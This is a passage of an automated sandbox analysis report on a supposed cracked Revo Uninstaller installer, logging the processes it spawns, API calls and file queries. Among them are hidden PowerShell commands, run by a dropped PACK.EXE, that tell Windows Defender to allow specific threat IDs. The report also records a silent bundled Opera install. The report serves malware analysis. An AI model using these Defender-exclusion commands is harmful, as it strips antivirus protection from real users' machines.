        Source: C:\Users\user\AppData\Local\Temp\PACK.EXECode function: 16_2_0030ACA1 GetProcessHeap,16_2_0030ACA1
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXECode function: 16_2_002FE4F5 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,16_2_002FE4F5
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXECode function: 16_2_002FE643 SetUnhandledExceptionFilter,16_2_002FE643
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXECode function: 16_2_002FE7FB SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,16_2_002FE7FB
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXECode function: 16_2_00307BE1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,16_2_00307BE1
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe Process created: C:\Windows\System32\rundll32.exe RUNDLL32.EXE SETUPAPI.DLL,InstallHinfSection DefaultInstall 132 C:\Program Files\VS Revo Group\Revo Uninstaller Pro\revoflt.inf
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe Process created: C:\Windows\System32\regsvr32.exe regsvr32.exe /s "C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RUExt.dll"
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe Process created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe "C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe" /bc
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe Process created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe "C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe" /regserver /NOREDIRECT
        Source: C:\Windows\System32\runonce.exe Process created: C:\Windows\System32\grpconv.exe "C:\Windows\System32\grpconv.exe" -o
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\PACK.EXE C:\Users\user\AppData\Local\Temp\PACK.EXE -p123
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXEProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nologo -noninteractive -windowStyle hidden -noprofile -command "Add-MpPreference -ThreatIDDefaultAction_Ids 2147781989 -ThreatIDDefaultAction_Actions Allow -Force"
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXEProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nologo -noninteractive -windowStyle hidden -noprofile -command "Add-MpPreference -ThreatIDDefaultAction_Ids 2147735505 -ThreatIDDefaultAction_Actions Allow -Force"
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXEProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nologo -noninteractive -windowStyle hidden -noprofile -command "Add-MpPreference -ThreatIDDefaultAction_Ids 2147814523 -ThreatIDDefaultAction_Actions Allow -Force"
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXEProcess created: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exe "C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exe"
        Source: C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exeProcess created: C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exe C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector-2.opera.com/ --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=115.0.5322.77 --initial-client-data=0x334,0x338,0x33c,0x2fc,0x340,0x6c8f7cf4,0x6c8f7d00,0x6c8f7d0c
        Source: C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exeProcess created: C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exe "C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --showunbox=0 --installfolder="C:\Users\user\AppData\Local\Programs\Opera" --profile-folder --language=en-GB --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=3532 --package-dir-prefix="C:\Users\user\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20241209114004" --session-guid=00c18248-fcc9-4b6b-a8b7-0c50518d9022 --server-tracking-blob="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 " --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=0C06000000000000
        Source: C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exeProcess created: C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exe C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector-2.opera.com/ --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=115.0.5322.77 --initial-client-data=0x324,0x328,0x32c,0x300,0x330,0x6bd17cf4,0x6bd17d00,0x6bd17d0c
        Source: C:\Users\user\Downloads\OperaSetup.exeProcess created: C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exe c:\users\user\appdata\local\temp\7zs49240581\setup.exe --silent --allusers=0 --server-tracking-blob=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
        Source: C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exeProcess created: C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exe c:\users\user\appdata\local\temp\7zs49240581\setup.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=c:\users\user\appdata\roaming\opera software\opera stable\crash reports" "--crash-count-file=c:\users\user\appdata\roaming\opera software\opera stable\crash_count.txt" --url=https://crashstats-collector-2.opera.com/ --annotation=channel=stable --annotation=plat=win32 --annotation=prod=operadesktop --annotation=ver=115.0.5322.77 --initial-client-data=0x334,0x338,0x33c,0x2fc,0x340,0x6c8f7cf4,0x6c8f7d00,0x6c8f7d0c
        Source: C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exeProcess created: C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exe "c:\users\user\appdata\local\temp\7zs49240581\setup.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --showunbox=0 --installfolder="c:\users\user\appdata\local\programs\opera" --profile-folder --language=en-gb --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=3532 --package-dir-prefix="c:\users\user\appdata\local\temp\.opera\opera installer temp\opera_package_20241209114004" --session-guid=00c18248-fcc9-4b6b-a8b7-0c50518d9022 --server-tracking-blob="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 " --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=0c06000000000000
        Source: C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exeProcess created: C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exe c:\users\user\appdata\local\temp\7zs49240581\setup.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=c:\users\user\appdata\roaming\opera software\opera stable\crash reports" "--crash-count-file=c:\users\user\appdata\roaming\opera software\opera stable\crash_count.txt" --url=https://crashstats-collector-2.opera.com/ --annotation=channel=stable --annotation=plat=win32 --annotation=prod=operadesktop --annotation=ver=115.0.5322.77 --initial-client-data=0x324,0x328,0x32c,0x300,0x330,0x6bd17cf4,0x6bd17d00,0x6bd17d0c
        Source: C:\Users\user\Downloads\OperaSetup.exeProcess created: C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exe c:\users\user\appdata\local\temp\7zs49240581\setup.exe --silent --allusers=0 --server-tracking-blob=nwm4ywuzowqyntkwzgnkmdzizdflodcxmdg5ywfhotyzngrjmwi4njg0mwe5ogmxzdbhognky2i2n2flotg3ztp7imnvdw50cnkioijvuyisimluc3rhbgxlcl9uyw1lijoit3blcmftzxr1cc5leguilcjwcm9kdwn0ijoib3blcmeilcjxdwvyesi6ii9vcgvyys9zdgfibguvd2luzg93cz91dg1fc291cmnlpurxtkxtvcz1dg1fbwvkaxvtpwfwyiz1dg1fy2ftcgfpz249cjewiiwidgltzxn0yw1wijoimtczmzc2mjm5oc4xndi4iiwidxnlcmfnzw50ijoitlnju19jbmv0yyaotw96awxsyskilcj1dg0ionsiy2ftcgfpz24ioijymtailcjtzwrpdw0ioijhcgiilcjzb3vyy2uioijev05mu1qifswidxvpzci6ijvlownkmgq0lwe0njmtndmxny05ntg0ltu2zdiwn2y0zwe3ncj9
        Source: C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exeProcess created: C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exe c:\users\user\appdata\local\temp\7zs49240581\setup.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=c:\users\user\appdata\roaming\opera software\opera stable\crash reports" "--crash-count-file=c:\users\user\appdata\roaming\opera software\opera stable\crash_count.txt" --url=https://crashstats-collector-2.opera.com/ --annotation=channel=stable --annotation=plat=win32 --annotation=prod=operadesktop --annotation=ver=115.0.5322.77 --initial-client-data=0x334,0x338,0x33c,0x2fc,0x340,0x6c8f7cf4,0x6c8f7d00,0x6c8f7d0c
        Source: C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exeProcess created: C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exe "c:\users\user\appdata\local\temp\7zs49240581\setup.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --showunbox=0 --installfolder="c:\users\user\appdata\local\programs\opera" --profile-folder --language=en-gb --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=3532 --package-dir-prefix="c:\users\user\appdata\local\temp\.opera\opera installer temp\opera_package_20241209114004" --session-guid=00c18248-fcc9-4b6b-a8b7-0c50518d9022 --server-tracking-blob="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 " --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=0c06000000000000
        Source: C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exeProcess created: C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exe c:\users\user\appdata\local\temp\7zs49240581\setup.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=c:\users\user\appdata\roaming\opera software\opera stable\crash reports" "--crash-count-file=c:\users\user\appdata\roaming\opera software\opera stable\crash_count.txt" --url=https://crashstats-collector-2.opera.com/ --annotation=channel=stable --annotation=plat=win32 --annotation=prod=operadesktop --annotation=ver=115.0.5322.77 --initial-client-data=0x324,0x328,0x32c,0x300,0x330,0x6bd17cf4,0x6bd17d00,0x6bd17d0c
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.00000000033DE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: BSYSLISTVIEW32SHELLDLL_DefViewSysListView32Program ManagerProgman
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000607C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: TrayNotifyWndHunter TopHunter RightHunter LeftShell_TrayWndHunter Window AOTHunter Window SizeHunter ModeHunter Bottom\Microsoft\Internet Explorer\Quick LaunchStart HunterHunter TransparencySDSysPagerToolbarWindow32SHELLDLL_DefViewSysListView3275%50%25%ReBarWindow32 /tn "Revo Uninstaller Pro Hunter Mode" /create /XML " /hunter\Explorer.exe/Delete /TN "Revo Uninstaller Pro Hunter Mode" /F schtasks.exe6.1Windows 7,8,VistaWindows XPWindows XP,Vista,7,8Windows 86.25.1Windows 7Windows Vista6.0Windows 8.16.310.110.05.2 %D %sUDMFT%06d%sUDTMP%sEVREM%06d %S %M %H %Tc%02ld
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.00000000040A9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: TrayNotifyWndHunter RightHunter TopShell_TrayWndHunter LeftHunter Window SizeHunter Window AOTHunter BottomHunter ModeStart Hunter\Microsoft\Internet Explorer\Quick LaunchSDHunter TransparencyToolbarWindow32SysPagerSysListView32SHELLDLL_DefView50%75%ReBarWindow3225%/create /XML /tn "Revo Uninstaller Pro Hunter Mode" \Explorer.exe" /hunterschtasks.exe/Delete /TN "Revo Uninstaller Pro Hunter Mode" /F
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000005177000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SYSLISTVIEW32SHELLDLL_DefViewSysListView32Program ManagerProgman`
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXECode function: 16_2_002FE34B cpuid 16_2_002FE34B
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXECode function: GetLocaleInfoW,GetNumberFormatW,16_2_002F9D99
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe Queries volume information: C:\ VolumeInformation
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe Queries volume information: C:\ VolumeInformation
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe Queries volume information: C:\ VolumeInformation
        Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
